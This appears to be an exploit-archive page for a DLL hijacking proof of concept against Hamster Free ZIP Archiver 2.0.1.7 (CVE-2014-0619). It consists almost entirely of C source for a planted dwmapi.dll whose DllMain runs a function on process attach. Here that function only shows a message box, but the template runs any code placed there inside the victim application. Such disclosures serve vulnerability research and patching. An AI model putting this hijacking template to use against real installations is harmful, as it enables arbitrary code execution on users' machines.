Home / os / wins2003

Hamster Free ZIP Archiver 2.0.1.7 DLL Hijacking

Posted on 17 October 2014

/* * Title: Hamster Free ZIP Archiver Dll Hijacking Exploit 2.0.1.7 (dwmapi.dll) * Version: 2.0.1.7 * Tested on: Windows XP SP2 en * Vendor: http://www.hamstersoft.com/ * Software-Link: http://www.hamstersoft.com/online/hfza_site/hfza_site_3_0_0_34_b26122013.exe * E-Mail: osanda[at]unseen.is * Author: Osanda Malith Jayathissa * CVE : CVE-2014-0619 * /! Author is not responsible for any damage you cause * Use this material for educational purposes only */ // All extensions are vulnerable #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Hamster Free ZIP Archiver DLL Hijacked Osanda Malith", "POC", MB_OK); } /*EOF*/

 

TOP